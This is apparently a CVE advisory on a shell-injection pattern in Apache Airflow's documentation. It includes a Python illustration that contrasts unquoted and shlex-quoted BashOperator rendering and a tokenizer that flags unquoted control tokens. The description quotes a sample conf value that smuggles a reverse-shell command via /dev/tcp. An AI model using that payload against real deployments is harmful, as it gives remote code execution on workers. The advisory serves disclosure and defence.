Severity: low
Affected versions:
- Apache Airflow (apache-airflow) 3.0.0 before 3.2.2
Description:
Apache Airflow's official documentation at `core-concepts/dag-run.html`
("Passing Parameters when triggering Dags") showed a verbatim
`BashOperator(bash_command="echo value: {{ dag_run.conf['conf1'] }}")` example
without any quoting / sanitization warning. Dag authors who copied the pattern
verbatim into deployments where users had `Dag.can_trigger` permission on the
affected Dag (typical multi-team deployments, hosted offerings exposing a
trigger API) could be exposed to shell-metacharacter injection via the `conf`
field of the trigger API: because the value is interpolated into the command
string unquoted, an authenticated trigger user could supply `"; bash
-i >& /dev/tcp/.../9999 0>&1; #"` as a `conf` value and reach an `os.exec` on
the worker. This CVE covers the documentation correction in `apache/airflow` PR
64129: the docs example now includes explicit shell-quoting and a safety
caveat. It affects deployments whose Dag code was modeled on the pre-correction
docs example, and it is the same class of issue as the prior CVE-2025-50213 and
CVE-2025-27018 documentation-pattern fixes. Users are advised to upgrade to
`apache-airflow` 3.2.2 or later to pick up the corrected documentation shipped
with the release.
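The following Python is an added illustration for this advisory; it is not Airflow's code and not the text of the corrected docs example. It assumes that Airflow renders `bash_command` with Jinja as a raw string substitution (no autoescaping) and hands the result to `bash -c`, which is how BashOperator behaves. The unquoted renderer reproduces the old docs pattern, the quoted renderer applies `shlex.quote` as one concrete way of doing the "explicit shell-quoting" the correction calls for (whether the docs use exactly that helper is not stated here), and `unquoted_control_tokens` tokenizes a rendered command the way a POSIX shell would so that a reviewer or a Dag-linting step can flag any command separator or redirection that sits outside quotes. The sample `conf` value is constructed and benign.

```python
import shlex

# Template from the pre-correction docs example. Airflow renders bash_command
# with Jinja (no autoescaping) and hands the result to `bash -c`.
UNQUOTED_TEMPLATE = "echo value: {{ dag_run.conf['conf1'] }}"
PLACEHOLDER = "{{ dag_run.conf['conf1'] }}"

# Tokens that end a command or redirect its I/O when they appear unquoted.
SHELL_CONTROL_TOKENS = {";", "&", "&&", "|", "||", "(", ")", "<", ">", ">>", ">&", "&>", "<&"}


def render_unquoted(conf_value: str) -> str:
    """Reproduce what the old docs pattern produced: raw string interpolation.

    Stand-in for Jinja rendering (assumption: a plain substitution is
    equivalent for this template, which uses no filters or escaping).
    """
    return UNQUOTED_TEMPLATE.replace(PLACEHOLDER, conf_value)


def render_quoted(conf_value: str) -> str:
    """Hardened form: shlex.quote wraps the value so bash sees one literal word.

    This is one way to apply the explicit shell-quoting the corrected docs
    call for; it is an assumption here, not the docs' exact wording.
    """
    return "echo value: " + shlex.quote(conf_value)


def unquoted_control_tokens(cmd: str) -> list[str]:
    """Tokenize `cmd` like a POSIX shell and return control tokens outside quotes.

    Quoted text collapses into a single word, so a properly quoted conf value
    never contributes a token here; an unquoted ';', '|', '>&' etc. does.
    """
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True  # keep words such as 'value:' intact
    return [tok for tok in lexer if tok in SHELL_CONTROL_TOKENS]


def is_injection_safe(cmd: str) -> bool:
    """True when the rendered command contains no unquoted control tokens."""
    return not unquoted_control_tokens(cmd)


if __name__ == "__main__":
    # Constructed sample: a conf value carrying a command separator.
    hostile = "hi; echo injected"
    for label, cmd in (("unquoted", render_unquoted(hostile)),
                       ("quoted", render_quoted(hostile))):
        print(f"{label:9s} {cmd!r:40s} control tokens: {unquoted_control_tokens(cmd)}")
```

Run stand-alone, the script shows the unquoted rendering producing a bare `;` token (a second command for bash) while the quoted rendering keeps the whole conf value as a single argument to `echo`. The tokenizer check is a useful guard to run over rendered `bash_command` strings in review or CI for Dags that still interpolate `dag_run.conf` values; it does not replace quoting, which is what actually removes the injection.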
Credit:
anonymous (finder)
Kevin Yang (sjyangkevin) (remediation developer)
References:
https://github.com/apache/airflow/pull/64129
https://airflow.apache.org/
https://www.cve.org/CVERecord?id=CVE-2026-42252